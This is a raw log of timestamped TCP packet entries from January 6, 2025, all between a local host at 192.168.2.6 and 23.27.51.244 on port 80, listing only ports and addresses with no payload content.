Jan 6, 2025 06:03:58.634079933 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634089947 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634100914 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634103060 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634111881 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634119034 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634123087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634133101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634144068 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634144068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634156942 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634162903 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634169102 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634179115 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634182930 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634188890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634206057 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634236097 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634509087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634520054 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634531021 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634541988 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634548903 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634552956 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634568930 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634569883 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634579897 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634588957 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634609938 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634620905 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634622097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634632111 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634639978 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634644032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634654999 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634664059 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634665966 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634671926 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634676933 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634682894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634694099 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634725094 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634985924 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635004044 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635015011 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635020018 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635056019 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635126114 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635135889 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635147095 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635158062 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635169029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635170937 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635178089 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635190964 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635215044 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635375977 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635386944 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635396957 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635413885 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635420084 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635423899 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635436058 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635442019 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635446072 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635457993 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635467052 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635468006 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635478973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635487080 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635490894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635500908 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635519981 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635544062 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635698080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635709047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635719061 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.635742903 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.635767937 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.722980976 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.722995043 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723006964 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723025084 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723035097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723046064 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723057032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723172903 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723176956 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723187923 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723197937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723207951 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723218918 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723237038 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723237038 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723261118 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723450899 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723468065 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723478079 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723489046 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723491907 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723500013 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723510981 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723516941 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723520994 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723531961 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723541975 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723551989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723552942 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723552942 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723581076 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723608971 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723792076 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723802090 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723812103 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723823071 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723835945 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723860025 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723929882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723941088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723949909 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723962069 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723970890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723977089 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723988056 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.723994017 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.723998070 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724008083 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724013090 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724018097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724029064 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724037886 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724039078 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724050045 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724057913 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724060059 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724071026 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724077940 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724081993 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724092960 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724098921 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724102974 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724112988 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724136114 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724701881 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724713087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724726915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724737883 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724747896 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724751949 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724759102 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724770069 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724775076 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724781036 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724792004 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724795103 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724802017 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724808931 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724819899 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.724832058 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.724855900 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.725061893 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725073099 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725081921 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725091934 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725101948 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725116968 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.725119114 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725130081 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725136042 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.725142956 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725151062 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.725152969 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725162983 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725174904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725174904 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.725184917 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725194931 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725195885 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.725205898 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725210905 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725214005 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.725222111 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725230932 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725240946 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725250959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725254059 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.725263119 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.725272894 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.725291014 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734031916 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734044075 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734055042 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734083891 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734113932 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734136105 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734146118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734155893 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734168053 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734174013 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734201908 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734349012 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734359980 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734369993 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734381914 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734392881 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734400034 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734404087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734421015 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734446049 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734463930 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734644890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734656096 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734666109 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734678030 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734688044 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734699011 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734709024 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734695911 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734719992 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734730005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734738111 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734738111 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734740019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734751940 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.734762907 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734762907 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734791040 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.734983921 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.735053062 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.735090971 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.735101938 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.735112906 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.735124111 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.735130072 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.735138893 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.735151052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.735160112 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.735162020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.735177040 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.735179901 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.735187054 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.735202074 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.735227108 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813162088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813184977 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813196898 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813226938 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813285112 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813296080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813306093 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813316107 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813337088 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813347101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813357115 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813358068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813369989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813380957 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813389063 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813390970 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813409090 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813430071 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813607931 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813618898 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813626051 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813637018 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813647032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813657999 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813673019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813673973 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813683987 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813695908 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813700914 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813719988 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813745022 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813936949 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813947916 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813958883 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813970089 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813980103 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813982964 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.813992023 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.813998938 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814002991 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814013958 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814023972 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814043045 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814057112 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814223051 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814233065 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814244032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814254999 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814265966 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814273119 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814279079 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814291000 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814294100 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814301968 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814310074 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814338923 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814367056 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814538956 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814548969 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814559937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814569950 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814579010 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814582109 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814593077 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814604044 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814626932 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814661980 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814672947 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814682007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814693928 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814697981 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814703941 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814714909 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814718962 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814726114 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814737082 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814747095 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814745903 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814759016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814765930 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814769030 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.814785004 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.814800978 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815119982 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815131903 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815141916 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815156937 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815186024 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815366030 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815376997 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815392017 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815402985 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815409899 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815413952 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815423965 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.815431118 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.815433979 CET	80	49709	23.27.51.244	192.168.2.6
